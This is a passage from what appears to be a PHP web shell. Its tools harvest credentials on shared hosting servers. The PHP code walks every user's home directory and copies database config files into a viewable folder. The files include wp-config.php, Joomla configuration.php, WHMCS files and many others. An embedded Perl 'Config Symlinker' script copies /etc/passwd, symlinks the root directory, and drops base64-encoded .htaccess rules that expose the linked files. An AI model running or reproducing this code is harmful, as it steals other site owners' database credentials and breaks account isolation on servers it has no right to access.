  859. foreach(getuser() as $user) {
  860. $user_docroot = "/home/$user/public_html/";
  861. if(is_readable($user_docroot)) {
  862. $getconfig = array(
  863. "/home/$user/.accesshash" => "WHM-accesshash",
  864. "$user_docroot/config/koneksi.php" => "Lokomedia",
  865. "$user_docroot/forum/config.php" => "phpBB",
  866. "$user_docroot/sites/default/settings.php" => "Drupal",
  867. "$user_docroot/config/settings.inc.php" => "PrestaShop",
  868. "$user_docroot/app/etc/local.xml" => "Magento",
  869. "$user_docroot/admin/config.php" => "OpenCart",
  870. "$user_docroot/application/config/database.php" => "Ellislab",
  871. "$user_docroot/vb/includes/config.php" => "Vbulletin",
  872. "$user_docroot/includes/config.php" => "Vbulletin",
  873. "$user_docroot/forum/includes/config.php" => "Vbulletin",
  874. "$user_docroot/forums/includes/config.php" => "Vbulletin",
  875. "$user_docroot/cc/includes/config.php" => "Vbulletin",
  876. "$user_docroot/inc/config.php" => "MyBB",
  877. "$user_docroot/includes/configure.php" => "OsCommerce",
  878. "$user_docroot/shop/includes/configure.php" => "OsCommerce",
  879. "$user_docroot/os/includes/configure.php" => "OsCommerce",
  880. "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
  881. "$user_docroot/products/includes/configure.php" => "OsCommerce",
  882. "$user_docroot/cart/includes/configure.php" => "OsCommerce",
  883. "$user_docroot/inc/conf_global.php" => "IPB",
  884. "$user_docroot/wp-config.php" => "Wordpress",
  885. "$user_docroot/wp/test/wp-config.php" => "Wordpress",
  886. "$user_docroot/blog/wp-config.php" => "Wordpress",
  887. "$user_docroot/beta/wp-config.php" => "Wordpress",
  888. "$user_docroot/portal/wp-config.php" => "Wordpress",
  889. "$user_docroot/site/wp-config.php" => "Wordpress",
  890. "$user_docroot/wp/wp-config.php" => "Wordpress",
  891. "$user_docroot/WP/wp-config.php" => "Wordpress",
  892. "$user_docroot/news/wp-config.php" => "Wordpress",
  893. "$user_docroot/wordpress/wp-config.php" => "Wordpress",
  894. "$user_docroot/test/wp-config.php" => "Wordpress",
  895. "$user_docroot/demo/wp-config.php" => "Wordpress",
  896. "$user_docroot/home/wp-config.php" => "Wordpress",
  897. "$user_docroot/v1/wp-config.php" => "Wordpress",
  898. "$user_docroot/v2/wp-config.php" => "Wordpress",
  899. "$user_docroot/press/wp-config.php" => "Wordpress",
  900. "$user_docroot/new/wp-config.php" => "Wordpress",
  901. "$user_docroot/blogs/wp-config.php" => "Wordpress",
  902. "$user_docroot/configuration.php" => "Joomla",
  903. "$user_docroot/blog/configuration.php" => "Joomla",
  904. "$user_docroot/submitticket.php" => "^WHMCS",
  905. "$user_docroot/cms/configuration.php" => "Joomla",
  906. "$user_docroot/beta/configuration.php" => "Joomla",
  907. "$user_docroot/portal/configuration.php" => "Joomla",
  908. "$user_docroot/site/configuration.php" => "Joomla",
  909. "$user_docroot/main/configuration.php" => "Joomla",
  910. "$user_docroot/home/configuration.php" => "Joomla",
  911. "$user_docroot/demo/configuration.php" => "Joomla",
  912. "$user_docroot/test/configuration.php" => "Joomla",
  913. "$user_docroot/v1/configuration.php" => "Joomla",
  914. "$user_docroot/v2/configuration.php" => "Joomla",
  915. "$user_docroot/joomla/configuration.php" => "Joomla",
  916. "$user_docroot/new/configuration.php" => "Joomla",
  917. "$user_docroot/WHMCS/submitticket.php" => "WHMCS",
  918. "$user_docroot/whmcs1/submitticket.php" => "WHMCS",
  919. "$user_docroot/Whmcs/submitticket.php" => "WHMCS",
  920. "$user_docroot/whmcs/submitticket.php" => "WHMCS",
  921. "$user_docroot/whmcs/submitticket.php" => "WHMCS",
  922. "$user_docroot/WHMC/submitticket.php" => "WHMCS",
  923. "$user_docroot/Whmc/submitticket.php" => "WHMCS",
  924. "$user_docroot/whmc/submitticket.php" => "WHMCS",
  925. "$user_docroot/WHM/submitticket.php" => "WHMCS",
  926. "$user_docroot/Whm/submitticket.php" => "WHMCS",
  927. "$user_docroot/whm/submitticket.php" => "WHMCS",
  928. "$user_docroot/HOST/submitticket.php" => "WHMCS",
  929. "$user_docroot/Host/submitticket.php" => "WHMCS",
  930. "$user_docroot/host/submitticket.php" => "WHMCS",
  931. "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
  932. "$user_docroot/Supportes/submitticket.php" => "WHMCS",
  933. "$user_docroot/supportes/submitticket.php" => "WHMCS",
  934. "$user_docroot/domains/submitticket.php" => "WHMCS",
  935. "$user_docroot/domain/submitticket.php" => "WHMCS",
  936. "$user_docroot/Hosting/submitticket.php" => "WHMCS",
  937. "$user_docroot/HOSTING/submitticket.php" => "WHMCS",
  938. "$user_docroot/hosting/submitticket.php" => "WHMCS",
  939. "$user_docroot/CART/submitticket.php" => "WHMCS",
  940. "$user_docroot/Cart/submitticket.php" => "WHMCS",
  941. "$user_docroot/cart/submitticket.php" => "WHMCS",
  942. "$user_docroot/ORDER/submitticket.php" => "WHMCS",
  943. "$user_docroot/Order/submitticket.php" => "WHMCS",
  944. "$user_docroot/order/submitticket.php" => "WHMCS",
  945. "$user_docroot/CLIENT/submitticket.php" => "WHMCS",
  946. "$user_docroot/Client/submitticket.php" => "WHMCS",
  947. "$user_docroot/client/submitticket.php" => "WHMCS",
  948. "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
  949. "$user_docroot/Clientarea/submitticket.php" => "WHMCS",
  950. "$user_docroot/clientarea/submitticket.php" => "WHMCS",
  951. "$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
  952. "$user_docroot/Support/submitticket.php" => "WHMCS",
  953. "$user_docroot/support/submitticket.php" => "WHMCS",
  954. "$user_docroot/BILLING/submitticket.php" => "WHMCS",
  955. "$user_docroot/Billing/submitticket.php" => "WHMCS",
  956. "$user_docroot/billing/submitticket.php" => "WHMCS",
  957. "$user_docroot/BUY/submitticket.php" => "WHMCS",
  958. "$user_docroot/Buy/submitticket.php" => "WHMCS",
  959. "$user_docroot/buy/submitticket.php" => "WHMCS",
  960. "$user_docroot/MANAGE/submitticket.php" => "WHMCS",
  961. "$user_docroot/Manage/submitticket.php" => "WHMCS",
  962. "$user_docroot/manage/submitticket.php" => "WHMCS",
  963. "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  964. "$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
  965. "$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
  966. "$user_docroot/clientsupport/submitticket.php" => "WHMCS",
  967. "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
  968. "$user_docroot/Checkout/submitticket.php" => "WHMCS",
  969. "$user_docroot/checkout/submitticket.php" => "WHMCS",
  970. "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
  971. "$user_docroot/Billings/submitticket.php" => "WHMCS",
  972. "$user_docroot/billings/submitticket.php" => "WHMCS",
  973. "$user_docroot/BASKET/submitticket.php" => "WHMCS",
  974. "$user_docroot/Basket/submitticket.php" => "WHMCS",
  975. "$user_docroot/basket/submitticket.php" => "WHMCS",
  976. "$user_docroot/SECURE/submitticket.php" => "WHMCS",
  977. "$user_docroot/Secure/submitticket.php" => "WHMCS",
  978. "$user_docroot/secure/submitticket.php" => "WHMCS",
  979. "$user_docroot/SALES/submitticket.php" => "WHMCS",
  980. "$user_docroot/Sales/submitticket.php" => "WHMCS",
  981. "$user_docroot/sales/submitticket.php" => "WHMCS",
  982. "$user_docroot/BILL/submitticket.php" => "WHMCS",
  983. "$user_docroot/Bill/submitticket.php" => "WHMCS",
  984. "$user_docroot/bill/submitticket.php" => "WHMCS",
  985. "$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
  986. "$user_docroot/Purchase/submitticket.php" => "WHMCS",
  987. "$user_docroot/purchase/submitticket.php" => "WHMCS",
  988. "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
  989. "$user_docroot/Account/submitticket.php" => "WHMCS",
  990. "$user_docroot/account/submitticket.php" => "WHMCS",
  991. "$user_docroot/USER/submitticket.php" => "WHMCS",
  992. "$user_docroot/User/submitticket.php" => "WHMCS",
  993. "$user_docroot/user/submitticket.php" => "WHMCS",
  994. "$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
  995. "$user_docroot/Clients/submitticket.php" => "WHMCS",
  996. "$user_docroot/clients/submitticket.php" => "WHMCS",
  997. "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
  998. "$user_docroot/Billings/submitticket.php" => "WHMCS",
  999. "$user_docroot/billings/submitticket.php" => "WHMCS",
  1000. "$user_docroot/MY/submitticket.php" => "WHMCS",
  1001. "$user_docroot/My/submitticket.php" => "WHMCS",
  1002. "$user_docroot/my/submitticket.php" => "WHMCS",
  1003. "$user_docroot/secure/whm/submitticket.php" => "WHMCS",
  1004. "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
  1005. "$user_docroot/panel/submitticket.php" => "WHMCS",
  1006. "$user_docroot/clientes/submitticket.php" => "WHMCS",
  1007. "$user_docroot/cliente/submitticket.php" => "WHMCS",
  1008. "$user_docroot/support/order/submitticket.php" => "WHMCS",
  1009. "$user_docroot/bb-config.php" => "BoxBilling",
  1010. "$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
  1011. "$user_docroot/box/bb-config.php" => "BoxBilling",
  1012. "$user_docroot/host/bb-config.php" => "BoxBilling",
  1013. "$user_docroot/Host/bb-config.php" => "BoxBilling",
  1014. "$user_docroot/supportes/bb-config.php" => "BoxBilling",
  1015. "$user_docroot/support/bb-config.php" => "BoxBilling",
  1016. "$user_docroot/hosting/bb-config.php" => "BoxBilling",
  1017. "$user_docroot/cart/bb-config.php" => "BoxBilling",
  1018. "$user_docroot/order/bb-config.php" => "BoxBilling",
  1019. "$user_docroot/client/bb-config.php" => "BoxBilling",
  1020. "$user_docroot/clients/bb-config.php" => "BoxBilling",
  1021. "$user_docroot/cliente/bb-config.php" => "BoxBilling",
  1022. "$user_docroot/clientes/bb-config.php" => "BoxBilling",
  1023. "$user_docroot/billing/bb-config.php" => "BoxBilling",
  1024. "$user_docroot/billings/bb-config.php" => "BoxBilling",
  1025. "$user_docroot/my/bb-config.php" => "BoxBilling",
  1026. "$user_docroot/secure/bb-config.php" => "BoxBilling",
  1027. "$user_docroot/support/order/bb-config.php" => "BoxBilling",
  1028. "$user_docroot/includes/dist-configure.php" => "Zencart",
  1029. "$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
  1030. "$user_docroot/products/includes/dist-configure.php" => "Zencart",
  1031. "$user_docroot/cart/includes/dist-configure.php" => "Zencart",
  1032. "$user_docroot/shop/includes/dist-configure.php" => "Zencart",
  1033. "$user_docroot/includes/iso4217.php" => "Hostbills",
  1034. "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
  1035. "$user_docroot/host/includes/iso4217.php" => "Hostbills",
  1036. "$user_docroot/Host/includes/iso4217.php" => "Hostbills",
  1037. "$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
  1038. "$user_docroot/support/includes/iso4217.php" => "Hostbills",
  1039. "$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
  1040. "$user_docroot/cart/includes/iso4217.php" => "Hostbills",
  1041. "$user_docroot/order/includes/iso4217.php" => "Hostbills",
  1042. "$user_docroot/client/includes/iso4217.php" => "Hostbills",
  1043. "$user_docroot/clients/includes/iso4217.php" => "Hostbills",
  1044. "$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
  1045. "$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
  1046. "$user_docroot/billing/includes/iso4217.php" => "Hostbills",
  1047. "$user_docroot/billings/includes/iso4217.php" => "Hostbills",
  1048. "$user_docroot/my/includes/iso4217.php" => "Hostbills",
  1049. "$user_docroot/secure/includes/iso4217.php" => "Hostbills",
  1050. "$user_docroot/support/order/includes/iso4217.php" => "Hostbills"
  1051.  
  1052. );
  1053. foreach($getconfig as $config => $userconfig) {
  1054. $get = file_get_contents($config);
  1055. if($get == '') {
  1056. }
  1057. else {
  1058. $fopen = fopen("idx_config/$user-$userconfig.txt", "w");
  1059. fputs($fopen, $get);
  1060. }
  1061. }
  1062. }
  1063. }
  1064. }
  1065. print "<div style='background: #ffffff; width: 100%; height: 100%'>";
  1066. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_config/' frameborder='0' scrolling='yes'><iframe>";
  1067. print "</div>";
  1068. }
  1069. elseif($toolsname === "symlink") {
  1070. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_sym'."));
  1071. if(!is_dir(path()."/idx_sym/")) {
  1072. $sym['code'] = "#!/usr/bin/perl -I/usr/local/bandmin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#		Name : Perl/CGI Config Symlinker (With Auto Bypass Symlink 404)
#		Version : 1.2
#		Created : 9 Mei 2017
#		Author : 0x1999
#		Thanks To : 0xIDiot , Indonesian Code Party , Jatim4u
#		More Info : http://0xDark.blogspot.com
#		Want to recode ? Don't forget my nick name  :)
#		http://facebook.com/melex.1d
#		
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

use File::Copy;
use strict;
use warnings;
use MIME::Base64;
copy("/etc/passwd","passwd.txt") ;
mkdir "idx_sym";
symlink("/","idx_sym/root");
my $filename = 'passwd.txt';
my $htaccess = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgDQpBZGRIYW5kbGVyIHRleHQvcGxhaW4gLnBocA0KU2F0aXNmeSBBbnkNCkluZGV4T3B0aW9ucyArQ2hhcnNldD1VVEYtOCArRmFuY3lJbmRleGluZyArSWdub3JlQ2FzZSArRm9sZGVyc0ZpcnN0ICtYSFRNTCArSFRNTFRhYmxlICtTdXBwcmVzc1J1bGVzICtTdXBwcmVzc0Rlc2NyaXB0aW9uICtOYW1lV2lkdGg9KiANCkFkZEljb24gJ2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBQkFBQUFBUUNBWUFBQUFmOC85aEFBQUFCSE5DU1ZRSUNBZ0lmQWhraUFBQUFBbHdTRmx6QUFBTjF3QUFEZGNCUWlpYmVBQUFBQmwwUlZoMFUyOW1kSGRoY21VQWQzZDNMbWx1YTNOallYQmxMbTl5WjV2dVBCb0FBQUZVU1VSQlZEaU5wWks5U2dOQkZJWFB2WE5uZGpjUm9wWDRVNGtXVnI1QUNoVTdIOEJTZkl0QUhrQjlDWHNyVzBHd0VRdFJ3VktNUnRBVThaY1lXYU5tTTJPeHF5eWlZWmRjR0lhWjRaNzdNZWVRY3c2REZBL1VEVUFBWUhIajhoT0FUajlvUlNlMloxZjJLalAxZmdMa25NUFM1bFcwVmk0cFpvcHZIWERXK0loT3I5OWdYVHprcjlxdlRCTXRyTmQ4QXNMVmNvbVpLRFA2MWtFTGloR0lKOVFCZ08yamRzSUUvSmI1T2FjR0ZBd0RRRWVNRU9abmgxRXFNQ2h0U0I4YTY0QlcyTU5oN1FWaWhDR0tjTkhzd21aMGxBa1lIeEY0UWhCUENLSVlSVTlsNjA1S21HQ0VJVVl6dENZTUJma0VqR1o0T2lId1JRRit2a1FHK3B0QUNJRlJFSlZQUUF2RmYrQnJqb3lRK0NaZnFxMTE4RFJGRWhqZWJiYmVsNmRHaXlUcWYrdlNya2FSUS8wdXRMN21IWGw5dnErZVAzVW5iaC9INWdES2lPRjY3WWViWTBkU0pjUkJtMHoyckZsMnlXcDhBVkRJVzMyZGE3cExBQUFBQUVsRlRrU3VRbUNDJyBeXkRJUkVDVE9SWV5eDQpEZWZhdWx0SWNvbiAnZGF0YTppbWFnZS9wbmc7YmFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFCQUFBQUFRQ0FZQUFBQWY4LzloQUFBQUFYTlNSMElBcnM0YzZRQUFBQVppUzBkRUFQOEEvd0Qvb0wybmt3QUFBQWx3U0ZsekFBQUxFd0FBQ3hNQkFKcWNHQUFBQUFkMFNVMUZCOW9KQmhjVEp2MkIyZDRBQUFKTVNVUkJWRGpMYlpPOVRoeFpFSVcvcWx2ZHRNMzhCTmdKUW1RZ0pHZCtBL01RQkx3R2ppd0gzbndka1NMdE8yeEVSRzVMcXhYUlNJUjJZRGZENEdrR00wUDNyYjRiOVBBejBsN3BTbFdsVzBmbm5Mb2xBSVBCNFBYaDRlRnVudWNBSUlMd2RFU2VaeUFpZm5wNit1OW9OTG8zZ00zTnpUZEhSKy8venZKTXpTeUpLS29kaUlnOEFYYXhlSXoxYkRaN014cU5mdGdTVVJEV3k3TFVuWjBkWW14QUZBVkVsSTZBRUN5Z0lzUVFzaXpMQk9BQkFET2pLQXBxaDd1N0dvQ1VXaXdZYmV0b1VIcnJQY3dDcW9GMktVZVhMekV6QnYwK3VRbVNITUVaOUY2U1pjcjZpNElzQk9hL2I3SFFNYUh0SUF3Z0xkSGFsREExZXYwZVFiU2pyRXJRd0pwcUY0ZUF4L2hvcUQxMzJtTWtKcmk1dVNPbEZoRWhwVVFJaW9qd2FtT0ROc2xqZlVXQ3FwTG5PYWFDU0tKdG5hQkNzWllqQWxsbVhJNHZhZW9hVlgwY2JTZGhtVVIzekFLdk5qWTZWaW9vMHRXemdFb25LYlcrS2tHV3QzVW50MENlR2ZKczlnK1VVMHJFR0hIL0h3L01qSDYvVCtQT2RGb1JOS0NoTTIyeG1PUGVzcGpQR1E2SHBOUTI3dDZzQUNEU05hbnlvbGpETEVkVmFGT0xlOFprVWpLNXVrcTN0NzlsUEM3L09EazVHYStZNk81TXF5bU53M1YxeTNoeXpmWDBocXZKTHliWEZkKytmMmQzZDBkbXMrcXZnNE9EejhmSHgwL0xzYmUzOTY0c1M3KzR1RWp1bnBxbVNlNmUzRDNONS9OMFdaYnRseTlmMDluWjJaL2IyOXYyZkxFZXZ2SzlxdjdjMnRvS2k4VWlpUWlxSGJtNnJpVzZhMTNmbit6djczK29xb3JoY0xnS1VGWFZQK2ZuNTIrTG9uajhJTEowUDhaSUNDRjkvUFRwQ2xocEJ2Z1BlbG9MOVU1NU5JQUFBQUFBU1VWT1JLNUNZSUk9Jw0KSW5kZXhJZ25vcmUgKi50eHQ0MDQNCkluZGV4U3R5bGVTaGVldCAnaHR0cDovL2V2ZW50LmluZG94cGxvaXQub3IuaWQvc3ltbGluay5jc3MnDQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9IF4uKjB4c3ltNDA0IFtOQ10NClJld3JpdGVSdWxlIFwudHh0JCAle1JFUVVFU1RfVVJJfTQwNCBbTCxSPTMwMi5OQ10=");
my $sym = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KSGVhZGVyTmFtZSAweDE5OTkudHh0DQpTYXRpc2Z5IEFueQ0KSW5kZXhPcHRpb25zIElnbm9yZUNhc2UgRmFuY3lJbmRleGluZyBGb2xkZXJzRmlyc3QgTmFtZVdpZHRoPSogRGVzY3JpcHRpb25XaWR0aD0qIFN1cHByZXNzSFRNTFByZWFtYmxlDQpJbmRleElnbm9yZSAqDQpJbmRleFN0eWxlU2hlZXQgJ2h0dHA6Ly9ldmVudC5pbmRveHBsb2l0Lm9yLmlkL3N5bWxpbmsuY3NzJw==");
open(my $fh1, '>', 'idx_sym/.htaccess');
print $fh1 "$htaccess";
close $fh1;
open(my $xx, '>', 'idx_sym/nemu.txt');
print $xx "$sym";
close $xx;
open(my $fh, '<:encoding(UTF-8)', $filename);
while (my $row = <$fh>) {
my @matches = $row =~ /(.*?):x:/g;
my $usernya = $1;
my @array = (
	{configdir => '/home/'.$usernya.'/.accesshash', type => 'WHM-accesshash' },
	{configdir => '/home/'.$usernya.'/public_html/config/koneksi.php', type => 'Lokomedia' },
	{configdir => '/home/'.$usernya.'/public_html/config/settings.inc.php', type => 'PrestaShop' },
	{configdir => '/home/'.$usernya.'/public_html/app/etc/local.xml', type => 'Magento' },
	{configdir => '/home/'.$usernya.'/public_html/admin/config.php', type => 'OpenCart' },
	{configdir => '/home/'.$usernya.'/public_html/application/config/database.php', type => 'Ellislab' },
	{configdir => '/home/'.$usernya.'/public_html/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blog/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/beta/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/portal/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/site/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/WP/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/news/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wordpress/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/demo/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/home/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v1/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v2/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/press/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/new/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blogs/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/blog/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/submitticket.php', type => '^WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cms/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/beta/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/portal/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/site/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/main/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/home/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/demo/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/test/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v1/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v2/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/joomla/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/new/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/WHMCS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs1/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHMC/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHM/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOST/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORTES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domains/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domain/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOSTING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CART/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ORDER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTAREA/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BUY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MANAGE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTSUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ClientSupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CHECKOUT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BASKET/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SECURE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SALES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILL/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/PURCHASE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Purchase/submitticket.php', type => 'WHMCS' },
